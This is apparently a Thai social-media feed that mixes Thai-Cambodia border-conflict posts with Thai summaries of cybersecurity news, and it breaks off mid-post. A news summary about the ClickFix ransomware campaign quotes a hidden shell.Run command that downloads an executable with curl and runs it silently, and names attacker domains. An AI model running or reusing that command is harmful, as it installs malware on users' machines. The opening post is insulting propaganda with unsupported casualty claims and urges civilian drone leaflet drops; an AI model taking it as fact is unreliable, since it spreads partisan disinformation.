ฮุนเซนฮุนมาเซนทิ้งศพทหารญาติของทหารเขมรกว่าหมื่นศพทั่วหมู่บ้านเขมรที่โดรนเราบินกลับไปถึงชาวบ้านมันได้,บินไปชุมชนเมืองใหญ่ๆมันด้วยเลย,เหยียบหยามว่าโดรนไทยก็มาถึงถิ่นมรึงได้,บวกทิ้งโปรยข่าวด้วยมืออีกว่ามรึง!!ฮุนเซนและฮุนมาเนตทิ้งศพทหารเขมรจนเน่าคาป่าไม่เก็บกู้ให้เกียรติทหารเขมรที่ตายและญาติของทหารไร้มนุษยธรรมขาดภาวะผู้นำทัพที่ดีอัดท้ายใบปลิวข่าวเป็นภาษาเขมรกับฮุนเซนมีมันส์กับนางมาลีแทนเมียหลวงมันอีก,ได้บันเทิงแน่นอน,ปิดทางเน็ตได้แต่ปิดทางตีนทางมือทำเองพื้นๆไม่ได้แน่นอน,ประชาชนติดพรมแดนเอาโดนบินไปฝั่งมันก็น่าจะได้นะ ทหารไทยเราไม่สะดวกก็จัดแทนเลย,ทหารไทยเราอย่าตั้งรับอย่างเดียว,มุกนี้ทำลายขวัญกำลังใจมันสดๆร้อนๆได้.กลยุทธทางทหารอีกมุม,เหี้ยให้มันบินโดรนมาก่อกวนเราฝ่ายเดียวทำไม,บินโดรนแบบนี้ทิ้งบอกว่าฮุนเซนทิ้งศพทหารเป็นหมื่นไปเลย. https://youtube.com/watch?v=BdOokE0rHO8&si=HNQv1Khb3rKHzwU-
    0 ความคิดเห็น 0 การแบ่งปัน 63 มุมมอง 0 รีวิว
  • โรงงานเฟกนิวส์! ผู้ใช้โซเชียลมีเดียชาวกัมพูชายังคงผลิตข่าวปลอมออกมาต่อเนื่อง ล่าสุดปั้นน้ำอ้างทหารตายเพราะโดนแก๊สพิษจากไทย

    อ่านต่อ..https://news1live.com/detail/9680000073215

    #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire


    โรงงานเฟกนิวส์! ผู้ใช้โซเชียลมีเดียชาวกัมพูชายังคงผลิตข่าวปลอมออกมาต่อเนื่อง ล่าสุดปั้นน้ำอ้างทหารตายเพราะโดนแก๊สพิษจากไทย อ่านต่อ..https://news1live.com/detail/9680000073215 #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    Haha
    2
    1 ความคิดเห็น 0 การแบ่งปัน 351 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: ฤดูร้อน—ช่วงเวลาทองของแฮกเกอร์ และบทเรียนที่องค์กรต้องไม่ละเลย

    ฤดูร้อนมักเป็นช่วงที่คนทำงานหยุดพัก เดินทางไกล หรือทำงานจากสถานที่ที่ไม่คุ้นเคย เช่น บ้านพักตากอากาศ โรงแรม หรือสนามบิน ซึ่งมักใช้ Wi-Fi สาธารณะที่ไม่มีการเข้ารหัสหรือระบบป้องกันที่ดีพอ

    ในขณะเดียวกัน ทีม IT และฝ่ายรักษาความปลอดภัยไซเบอร์ขององค์กรก็ลดกำลังลงจากการลาพักร้อน ทำให้การตรวจสอบภัยคุกคามลดลงอย่างเห็นได้ชัด

    ผลคือ แฮกเกอร์ใช้โอกาสนี้ในการโจมตีแบบ phishing, ransomware และการขโมยข้อมูลผ่านเครือข่ายปลอม โดยเฉพาะการปลอมอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก ซึ่งดูเหมือนจริงจนผู้ใช้หลงเชื่อ

    ข้อมูลจากหลายแหล่งระบุว่า การโจมตีไซเบอร์ในฤดูร้อนเพิ่มขึ้นเฉลี่ย 30% โดยเฉพาะในกลุ่มองค์กรที่มีการทำงานแบบ remote และไม่มีนโยบายรักษาความปลอดภัยที่ชัดเจน

    ฤดูร้อนเป็นช่วงที่การโจมตีไซเบอร์เพิ่มขึ้นอย่างมีนัยสำคัญ
    การโจมตีเพิ่มขึ้นเฉลี่ย 30% ในช่วงเดือนมิถุนายน–สิงหาคม
    เกิดจากการลดกำลังของทีม IT และการใช้เครือข่ายที่ไม่ปลอดภัย

    ผู้ใช้มักเชื่อมต่อ Wi-Fi สาธารณะจากโรงแรม สนามบิน หรือบ้านพัก โดยไม่รู้ว่ามีความเสี่ยง
    เสี่ยงต่อการถูกดักข้อมูลหรือปลอมเครือข่าย
    อุปกรณ์ส่วนตัวมักไม่มีระบบป้องกันเท่ากับอุปกรณ์องค์กร

    แฮกเกอร์ใช้ phishing ที่เลียนแบบอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก
    หลอกให้ผู้ใช้กรอกข้อมูลบัตรเครดิตหรือรหัสผ่าน
    ใช้เทคนิคที่เหมือนจริงมากขึ้นด้วย generative AI

    องค์กรมักเลื่อนการอัปเดตระบบและการตรวจสอบความปลอดภัยไปหลังช่วงพักร้อน
    ทำให้เกิดช่องโหว่ที่แฮกเกอร์สามารถเจาะเข้าได้ง่าย
    ไม่มีการสำรองข้อมูลหรือทดสอบระบบอย่างสม่ำเสมอ

    ภัยคุกคามที่พบบ่อยในฤดูร้อน ได้แก่ ransomware, credential theft และ shadow IT
    การใช้แอปที่ไม่ได้รับอนุญาตหรือแชร์ไฟล์ผ่านช่องทางที่ไม่ปลอดภัย
    การขโมยข้อมูลบัญชีผ่านการดักจับการสื่อสาร

    การใช้อุปกรณ์ส่วนตัวที่ไม่มีระบบป้องกันเข้าถึงข้อมูลองค์กรเป็นช่องโหว่สำคัญ
    ไม่มีการเข้ารหัสหรือระบบป้องกันไวรัส
    เสี่ยงต่อการถูกขโมยข้อมูลหรือเข้าถึงระบบภายใน

    การลดกำลังทีม IT ในช่วงฤดูร้อนทำให้การตอบสนองต่อภัยคุกคามล่าช้า
    แฮกเกอร์สามารถแฝงตัวในระบบได้นานขึ้น
    อาจเกิดการโจมตีแบบ ransomware โดยไม่มีใครตรวจพบ

    การไม่มีแผนรับมือหรือผู้รับผิดชอบเมื่อเกิดเหตุการณ์ไซเบอร์อาจทำให้ความเสียหายขยายตัว
    ไม่มีการแจ้งเตือนหรือกู้คืนข้อมูลทันเวลา
    องค์กรอาจสูญเสียข้อมูลสำคัญหรือความน่าเชื่อถือ

    การใช้ Wi-Fi สาธารณะโดยไม่ใช้ VPN หรือระบบป้องกันเป็นพฤติกรรมเสี่ยงสูง
    ข้อมูลส่วนตัวและข้อมูลองค์กรอาจถูกดักจับ
    เสี่ยงต่อการถูกโจมตีแบบ man-in-the-middle

    https://www.csoonline.com/article/4030931/summer-why-cybersecurity-needs-to-be-further-strengthened.html
    🎙️ เรื่องเล่าจากข่าว: ฤดูร้อน—ช่วงเวลาทองของแฮกเกอร์ และบทเรียนที่องค์กรต้องไม่ละเลย ฤดูร้อนมักเป็นช่วงที่คนทำงานหยุดพัก เดินทางไกล หรือทำงานจากสถานที่ที่ไม่คุ้นเคย เช่น บ้านพักตากอากาศ โรงแรม หรือสนามบิน ซึ่งมักใช้ Wi-Fi สาธารณะที่ไม่มีการเข้ารหัสหรือระบบป้องกันที่ดีพอ ในขณะเดียวกัน ทีม IT และฝ่ายรักษาความปลอดภัยไซเบอร์ขององค์กรก็ลดกำลังลงจากการลาพักร้อน ทำให้การตรวจสอบภัยคุกคามลดลงอย่างเห็นได้ชัด ผลคือ แฮกเกอร์ใช้โอกาสนี้ในการโจมตีแบบ phishing, ransomware และการขโมยข้อมูลผ่านเครือข่ายปลอม โดยเฉพาะการปลอมอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก ซึ่งดูเหมือนจริงจนผู้ใช้หลงเชื่อ ข้อมูลจากหลายแหล่งระบุว่า การโจมตีไซเบอร์ในฤดูร้อนเพิ่มขึ้นเฉลี่ย 30% โดยเฉพาะในกลุ่มองค์กรที่มีการทำงานแบบ remote และไม่มีนโยบายรักษาความปลอดภัยที่ชัดเจน ✅ ฤดูร้อนเป็นช่วงที่การโจมตีไซเบอร์เพิ่มขึ้นอย่างมีนัยสำคัญ ➡️ การโจมตีเพิ่มขึ้นเฉลี่ย 30% ในช่วงเดือนมิถุนายน–สิงหาคม ➡️ เกิดจากการลดกำลังของทีม IT และการใช้เครือข่ายที่ไม่ปลอดภัย ✅ ผู้ใช้มักเชื่อมต่อ Wi-Fi สาธารณะจากโรงแรม สนามบิน หรือบ้านพัก โดยไม่รู้ว่ามีความเสี่ยง ➡️ เสี่ยงต่อการถูกดักข้อมูลหรือปลอมเครือข่าย ➡️ อุปกรณ์ส่วนตัวมักไม่มีระบบป้องกันเท่ากับอุปกรณ์องค์กร ✅ แฮกเกอร์ใช้ phishing ที่เลียนแบบอีเมลจากสายการบินหรือแพลตฟอร์มจองที่พัก ➡️ หลอกให้ผู้ใช้กรอกข้อมูลบัตรเครดิตหรือรหัสผ่าน ➡️ ใช้เทคนิคที่เหมือนจริงมากขึ้นด้วย generative AI ✅ องค์กรมักเลื่อนการอัปเดตระบบและการตรวจสอบความปลอดภัยไปหลังช่วงพักร้อน ➡️ ทำให้เกิดช่องโหว่ที่แฮกเกอร์สามารถเจาะเข้าได้ง่าย ➡️ ไม่มีการสำรองข้อมูลหรือทดสอบระบบอย่างสม่ำเสมอ ✅ ภัยคุกคามที่พบบ่อยในฤดูร้อน ได้แก่ ransomware, credential theft และ shadow IT ➡️ การใช้แอปที่ไม่ได้รับอนุญาตหรือแชร์ไฟล์ผ่านช่องทางที่ไม่ปลอดภัย ➡️ การขโมยข้อมูลบัญชีผ่านการดักจับการสื่อสาร ‼️ การใช้อุปกรณ์ส่วนตัวที่ไม่มีระบบป้องกันเข้าถึงข้อมูลองค์กรเป็นช่องโหว่สำคัญ ⛔ ไม่มีการเข้ารหัสหรือระบบป้องกันไวรัส ⛔ เสี่ยงต่อการถูกขโมยข้อมูลหรือเข้าถึงระบบภายใน ‼️ การลดกำลังทีม IT ในช่วงฤดูร้อนทำให้การตอบสนองต่อภัยคุกคามล่าช้า ⛔ แฮกเกอร์สามารถแฝงตัวในระบบได้นานขึ้น ⛔ อาจเกิดการโจมตีแบบ ransomware โดยไม่มีใครตรวจพบ ‼️ การไม่มีแผนรับมือหรือผู้รับผิดชอบเมื่อเกิดเหตุการณ์ไซเบอร์อาจทำให้ความเสียหายขยายตัว ⛔ ไม่มีการแจ้งเตือนหรือกู้คืนข้อมูลทันเวลา ⛔ องค์กรอาจสูญเสียข้อมูลสำคัญหรือความน่าเชื่อถือ ‼️ การใช้ Wi-Fi สาธารณะโดยไม่ใช้ VPN หรือระบบป้องกันเป็นพฤติกรรมเสี่ยงสูง ⛔ ข้อมูลส่วนตัวและข้อมูลองค์กรอาจถูกดักจับ ⛔ เสี่ยงต่อการถูกโจมตีแบบ man-in-the-middle https://www.csoonline.com/article/4030931/summer-why-cybersecurity-needs-to-be-further-strengthened.html
    WWW.CSOONLINE.COM
    Summer: Why cybersecurity must be strengthened as vacations abound
    Letting your guard down is not the most reasonable thing to do at a time when cybersecurity risks are on the rise; cyber attackers are not resting. What's more, they are well aware of what happens at this time of year, hence they take advantage of the circumstance to launch more aggressive campaigns.
    0 ความคิดเห็น 0 การแบ่งปัน 89 มุมมอง 0 รีวิว
  • ทูต ทหาร และสื่อต่างประเทศ รับทราบข้อเท็จจริงกรณีสถานการณ์แนวชายแดนไทย-กัมพูชา
    https://www.thai-tai.tv/news/20705/
    .
    #ไทยไท #ชายแดนไทยกัมพูชา #อุบลราชธานี #ความโปร่งใส #ทูตนานาชาติ #กองทัพไทย #ข่าวปลอม #การป้องกันตนเอง #ความสูญเสีย #อพยพ
    ทูต ทหาร และสื่อต่างประเทศ รับทราบข้อเท็จจริงกรณีสถานการณ์แนวชายแดนไทย-กัมพูชา https://www.thai-tai.tv/news/20705/ . #ไทยไท #ชายแดนไทยกัมพูชา #อุบลราชธานี #ความโปร่งใส #ทูตนานาชาติ #กองทัพไทย #ข่าวปลอม #การป้องกันตนเอง #ความสูญเสีย #อพยพ
    0 ความคิดเห็น 0 การแบ่งปัน 83 มุมมอง 0 รีวิว
  • ♣ เขมรปั่นข่าวปลอมระงับขายกริพเพน ส่วนหุ้นบริษัทผู้ผลิตพุ่งหลังไทยรีวิวคุณภาพเป็นเจ้าแรก ทรงนี้มีแต่จะเพิ่มจำนวนฝูงบินนะเหม
    #7ดอกจิก
    ♣ เขมรปั่นข่าวปลอมระงับขายกริพเพน ส่วนหุ้นบริษัทผู้ผลิตพุ่งหลังไทยรีวิวคุณภาพเป็นเจ้าแรก ทรงนี้มีแต่จะเพิ่มจำนวนฝูงบินนะเหม #7ดอกจิก
    0 ความคิดเห็น 0 การแบ่งปัน 98 มุมมอง 0 รีวิว
  • เปิดหลักฐานชุดใหญ่! โฆษกรัฐบาลยันไทยใช้สิทธิป้องกันตนเอง กัมพูชาป่วนชายแดน พุ่งเป้า โจมตี"พลเรือน" - บิดเบือนข้อมูล
    https://www.thai-tai.tv/news/20685/
    .
    #ไทยไท #ThailandFactMission #TruthfromThailand #สถานการณ์ไทยกัมพูชา #กองทัพไทย #ชายแดนไทยกัมพูชา #ความขัดแย้งชายแดน #กฎหมายระหว่างประเทศ #ข่าวปลอม
    เปิดหลักฐานชุดใหญ่! โฆษกรัฐบาลยันไทยใช้สิทธิป้องกันตนเอง กัมพูชาป่วนชายแดน พุ่งเป้า โจมตี"พลเรือน" - บิดเบือนข้อมูล https://www.thai-tai.tv/news/20685/ . #ไทยไท #ThailandFactMission #TruthfromThailand #สถานการณ์ไทยกัมพูชา #กองทัพไทย #ชายแดนไทยกัมพูชา #ความขัดแย้งชายแดน #กฎหมายระหว่างประเทศ #ข่าวปลอม
    0 ความคิดเห็น 0 การแบ่งปัน 96 มุมมอง 0 รีวิว
  • ผบก.สอท.1 เร่งประสาน กระทรวงดีอี ปิดกั้นข่าวปลอมจากสื่อโซเชี่ยลกัมพูชา สร้างความสับสน แนะคนไทยติดตามข่าวสารจากเพจทางการเท่านั้น

    อ่านต่อ..https://news1live.com/detail/9680000072781

    #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    ผบก.สอท.1 เร่งประสาน กระทรวงดีอี ปิดกั้นข่าวปลอมจากสื่อโซเชี่ยลกัมพูชา สร้างความสับสน แนะคนไทยติดตามข่าวสารจากเพจทางการเท่านั้น อ่านต่อ..https://news1live.com/detail/9680000072781 #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    3
    0 ความคิดเห็น 0 การแบ่งปัน 346 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: ธีม WordPress “Alone” ถูกเจาะทะลุ—เปิดทางให้แฮกเกอร์ยึดเว็บแบบเงียบ ๆ

    ธีม Alone – Charity Multipurpose Non-profit ซึ่งถูกใช้ในเว็บไซต์องค์กรการกุศลกว่า 200 แห่งทั่วโลก ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ที่เปิดให้ผู้ไม่ประสงค์ดีสามารถอัปโหลดไฟล์ ZIP ที่มี backdoor PHP เพื่อรันคำสั่งจากระยะไกล และสร้างบัญชีผู้ดูแลระบบปลอมได้ทันที

    ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ซึ่งเพิ่งได้รับการแก้ไขเมื่อวันที่ 16 มิถุนายน 2025 แต่การโจมตีเริ่มขึ้นตั้งแต่วันที่ 12 กรกฎาคม ก่อนที่ช่องโหว่จะถูกเปิดเผยต่อสาธารณะเพียง 2 วัน โดย Wordfence รายงานว่ามีความพยายามโจมตีมากกว่า 120,000 ครั้งแล้วจากหลาย IP ทั่วโลก

    แฮกเกอร์ใช้ช่องโหว่นี้เพื่อ:
    - สร้างบัญชีแอดมินปลอม
    - อัปโหลดมัลแวร์
    - เปลี่ยนเส้นทางผู้เยี่ยมชมไปยังเว็บฟิชชิ่ง
    - ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์อื่น

    ธีม Alone – Charity Multipurpose ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394
    คะแนนความรุนแรง 9.8/10
    เปิดทางให้แฮกเกอร์อัปโหลดไฟล์และรันคำสั่งจากระยะไกล

    ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5
    เวอร์ชันที่ปลอดภัยคือ 7.8.5 ขึ้นไป
    ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี

    Wordfence รายงานว่ามีการโจมตีมากกว่า 120,000 ครั้งแล้ว
    เริ่มโจมตีตั้งแต่วันที่ 12 กรกฎาคม 2025
    ใช้ไฟล์ ZIP ที่มี backdoor เช่น wp-classic-editor.zip

    แฮกเกอร์สามารถสร้างบัญชีแอดมินปลอมและควบคุมเว็บไซต์ได้เต็มรูปแบบ
    ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์หรือ redirect ไปยังเว็บอันตราย
    อาจส่งผลต่อชื่อเสียงและข้อมูลผู้ใช้งาน

    ธีมนี้ถูกใช้ในเว็บไซต์องค์กรการกุศลและ NGO กว่า 200 แห่งทั่วโลก
    มีฟีเจอร์ donation integration และรองรับ Elementor/WPBakery
    เป็นธีมเชิงพาณิชย์ที่ได้รับความนิยมในกลุ่มไม่แสวงหากำไร

    หากยังใช้เวอร์ชันก่อน 7.8.5 เว็บไซต์ของคุณเสี่ยงต่อการถูกยึดครองทันที
    ช่องโหว่เปิดให้ผู้ไม่ประสงค์ดีเข้าถึงระบบโดยไม่ต้องล็อกอิน
    อาจถูกใช้เป็นฐานปล่อยมัลแวร์หรือขโมยข้อมูลผู้ใช้

    การโจมตีเกิดขึ้นก่อนการเปิดเผยช่องโหว่ต่อสาธารณะ
    แสดงว่าแฮกเกอร์ติดตามการเปลี่ยนแปลงโค้ดอย่างใกล้ชิด
    อาจมีการโจมตีแบบ zero-day ในธีมอื่น ๆ อีก

    ผู้ดูแลเว็บไซต์อาจไม่รู้ว่าถูกเจาะ เพราะมัลแวร์ถูกซ่อนไว้อย่างแนบเนียน
    เช่น การสร้างผู้ใช้ชื่อ “officialwp” หรือการซ่อนไฟล์ใน mu-plugins
    ต้องตรวจสอบ log และผู้ใช้แอดมินอย่างละเอียด

    การใช้ธีมและปลั๊กอินจากแหล่งที่ไม่ปลอดภัยเพิ่มความเสี่ยงอย่างมาก
    ธีมเชิงพาณิชย์ที่ไม่มีการอัปเดตสม่ำเสมออาจมีช่องโหว่
    ควรใช้ธีมที่ได้รับการตรวจสอบจากผู้เชี่ยวชาญด้านความปลอดภัย

    https://www.techradar.com/pro/security/hackers-target-critical-wordpress-theme-flaw-thousands-of-sites-at-risk-from-potential-takeover-find-out-if-youre-affected
    🎙️ เรื่องเล่าจากข่าว: ธีม WordPress “Alone” ถูกเจาะทะลุ—เปิดทางให้แฮกเกอร์ยึดเว็บแบบเงียบ ๆ ธีม Alone – Charity Multipurpose Non-profit ซึ่งถูกใช้ในเว็บไซต์องค์กรการกุศลกว่า 200 แห่งทั่วโลก ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ที่เปิดให้ผู้ไม่ประสงค์ดีสามารถอัปโหลดไฟล์ ZIP ที่มี backdoor PHP เพื่อรันคำสั่งจากระยะไกล และสร้างบัญชีผู้ดูแลระบบปลอมได้ทันที ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ซึ่งเพิ่งได้รับการแก้ไขเมื่อวันที่ 16 มิถุนายน 2025 แต่การโจมตีเริ่มขึ้นตั้งแต่วันที่ 12 กรกฎาคม ก่อนที่ช่องโหว่จะถูกเปิดเผยต่อสาธารณะเพียง 2 วัน โดย Wordfence รายงานว่ามีความพยายามโจมตีมากกว่า 120,000 ครั้งแล้วจากหลาย IP ทั่วโลก แฮกเกอร์ใช้ช่องโหว่นี้เพื่อ: - สร้างบัญชีแอดมินปลอม - อัปโหลดมัลแวร์ - เปลี่ยนเส้นทางผู้เยี่ยมชมไปยังเว็บฟิชชิ่ง - ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์อื่น ✅ ธีม Alone – Charity Multipurpose ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ➡️ คะแนนความรุนแรง 9.8/10 ➡️ เปิดทางให้แฮกเกอร์อัปโหลดไฟล์และรันคำสั่งจากระยะไกล ✅ ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ➡️ เวอร์ชันที่ปลอดภัยคือ 7.8.5 ขึ้นไป ➡️ ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี ✅ Wordfence รายงานว่ามีการโจมตีมากกว่า 120,000 ครั้งแล้ว ➡️ เริ่มโจมตีตั้งแต่วันที่ 12 กรกฎาคม 2025 ➡️ ใช้ไฟล์ ZIP ที่มี backdoor เช่น wp-classic-editor.zip ✅ แฮกเกอร์สามารถสร้างบัญชีแอดมินปลอมและควบคุมเว็บไซต์ได้เต็มรูปแบบ ➡️ ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์หรือ redirect ไปยังเว็บอันตราย ➡️ อาจส่งผลต่อชื่อเสียงและข้อมูลผู้ใช้งาน ✅ ธีมนี้ถูกใช้ในเว็บไซต์องค์กรการกุศลและ NGO กว่า 200 แห่งทั่วโลก ➡️ มีฟีเจอร์ donation integration และรองรับ Elementor/WPBakery ➡️ เป็นธีมเชิงพาณิชย์ที่ได้รับความนิยมในกลุ่มไม่แสวงหากำไร ‼️ หากยังใช้เวอร์ชันก่อน 7.8.5 เว็บไซต์ของคุณเสี่ยงต่อการถูกยึดครองทันที ⛔ ช่องโหว่เปิดให้ผู้ไม่ประสงค์ดีเข้าถึงระบบโดยไม่ต้องล็อกอิน ⛔ อาจถูกใช้เป็นฐานปล่อยมัลแวร์หรือขโมยข้อมูลผู้ใช้ ‼️ การโจมตีเกิดขึ้นก่อนการเปิดเผยช่องโหว่ต่อสาธารณะ ⛔ แสดงว่าแฮกเกอร์ติดตามการเปลี่ยนแปลงโค้ดอย่างใกล้ชิด ⛔ อาจมีการโจมตีแบบ zero-day ในธีมอื่น ๆ อีก ‼️ ผู้ดูแลเว็บไซต์อาจไม่รู้ว่าถูกเจาะ เพราะมัลแวร์ถูกซ่อนไว้อย่างแนบเนียน ⛔ เช่น การสร้างผู้ใช้ชื่อ “officialwp” หรือการซ่อนไฟล์ใน mu-plugins ⛔ ต้องตรวจสอบ log และผู้ใช้แอดมินอย่างละเอียด ‼️ การใช้ธีมและปลั๊กอินจากแหล่งที่ไม่ปลอดภัยเพิ่มความเสี่ยงอย่างมาก ⛔ ธีมเชิงพาณิชย์ที่ไม่มีการอัปเดตสม่ำเสมออาจมีช่องโหว่ ⛔ ควรใช้ธีมที่ได้รับการตรวจสอบจากผู้เชี่ยวชาญด้านความปลอดภัย https://www.techradar.com/pro/security/hackers-target-critical-wordpress-theme-flaw-thousands-of-sites-at-risk-from-potential-takeover-find-out-if-youre-affected
    0 ความคิดเห็น 0 การแบ่งปัน 123 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

    ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

    เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

    เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

    Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

    Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
    หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
    หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

    ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
    เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
    ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

    แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
    เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
    ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

    Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
    มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
    ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

    โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
    เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
    มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

    ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
    ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
    การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

    องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
    ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
    Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

    การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
    ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
    ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

    ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
    การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
    ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

    https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ 